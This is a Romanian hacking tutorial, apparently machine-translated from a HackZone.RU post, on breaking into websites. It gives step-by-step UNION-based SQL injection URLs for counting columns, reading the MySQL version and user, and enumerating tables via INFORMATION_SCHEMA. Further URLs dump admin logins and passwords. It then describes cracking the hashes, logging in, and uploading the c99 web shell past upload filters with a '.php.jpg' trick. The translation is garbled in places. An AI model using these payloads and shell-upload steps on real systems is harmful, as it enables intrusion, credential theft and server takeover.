Hacking un site folosind SQL-Injection și umplerea shell pe gazdă.
Bună ziua, domnilor. Așa că am decis să scriu un articol cu privire la conținutul atacului SQL pe scară largă - Injectarea și la încărcarea shell-ului (shell) pe site-ul hacked. Articolele de acest fel, desigur, multe, dar încă unul, cred că nu va face rău că nu este clar acolo, poate fi cel puțin puțin mai clară aici.
țintă. noi / lol. php. id = 5 + comanda + de +12 - nici o eroare, apoi câmpuri sau mai mult de 12 sau 12. țintă. noi / lol. php. id = 20 este o eroare. Înseamnă mai puțin de 20 de câmpuri. Și așa până ajungem la rezultat. Prin selectarea uniunii, acesta va arăta astfel: țintă. noi / lol. php. id = -5 + union + select + 1,2,3,4,5,6,7,8,9,10,11,12 / *, etc. Pentru a afla versiunea MySQL. care este instalat pe server, executați interogarea: target. noi / lol. php. id = -5 + union + selectați +1,2,3, VERSION (), 5,6,7,8,9,10,11,12 / * (puteți afla utilizatorul și prin comanda USER ()) și în browser-ul direct pe pagina site-ului va arunca versiunea bazei de date. Principalul lucru pe care trebuie sa il priviti este 5 sau 4. Deoarece în data de 5 există INFORMAȚII _ SCHEMA _ TABELURI. acolo va fi mai ușor să alegeți.
Acum știm numele denumirilor tabelului. Dacă versiunea bazei de date este a 4-a, atunci vom ghici numele, vom compune o interogare de tip țintă. noi / lol. php. id = -5 + uniune + selectați +1,2,3, admin, 5,6,7,8,9,10,11,12 + de la + Utilizatori / * (Nume utilizator posibil al bazei de date), dacă ați ghicit numele și tabelul (Utilizatorii), apoi ieșiți cu nume în browser și mergeți până când obțineți rezultatul. Dacă versiunea "musculare" (MySQL) este a 5-a, atunci va fi mai ușor pentru dvs., compunem o interogare ca: țintă. noi / lol. php. id = -5 + uniune + selectați +1,2,3, nume tabelă, 5,6,7,8,9,10,11,12 + de la + INFORMATION_SCHEMA.TABLES / * și de asemenea, vedeți ieșirea de nume în browser . Să spunem numele tabelului de administrare și avem nevoie de o coloană cu parole. Să compunem interogarea. țintă. noi / lol. php. id = -5 + unire + selectați +1,2,3, parole, 5,6,7,8,9,10,11,12 + de la + admin / * În mod similar, este aleasă și login, puteți face totul mai frumos dând comanda țintă. noi / lol. php. id = -5 + unire + selectați +1,2,3, concat_ws (0 x 3 a. parole, 0 x 3 a. login), 5,6,7,8,9,10,11,12 + de la + admin / *. Obțineți rezultatul tipului de conectare, parola (de exemplu, admin; qwerty). În diferite cazuri poate fi diferit, prin urmare este necesar să gândim puțin. Dacă obținem un hash de parolă, atunci vom merge brut, dacă trimitem doar parola, atunci suntem fericiți. Deci, am primit numele de utilizator / parola, conectați-vă la sistem. Ei bine, avem drepturile administratorului, ei bine, nu sunt interesați să nu meargă pe servo. Dar pentru aceasta am descărcat shell-ul, de exemplu c 99 madshell. cu siguranță că va avea extensia txt. deci schimbați la php. Turna pe server poate, de exemplu, printr-o anumită formă de încărcare (încărcare), prin care administratorii umple ceva (de exemplu, imagini). Dar uneori se întâmplă că există un filtru, adică nu putem umple bine dosarul php. Apoi, du-te la truc, fă-o așa. php. jpg Acest filtru poate săriți, dacă este ratat - este super! Mergeți la browserul vizat aici. us / c 99 madshell. php. jpg și bucurați-vă că shell-ul este inundat, putem merge pe servo! Dacă serverul se află pe sistemul UNIX. atunci ar fi bine să știți mai multe și unele dintre echipele ei.
Asta este, trenați noii veniți! Vă doresc mult noroc în eforturile voastre dificile!
În viitor, pot scrie mai multe articole despre atacurile asupra altor baze de date, de exemplu, MSSQL.
Dementor special pentru HackZone.RU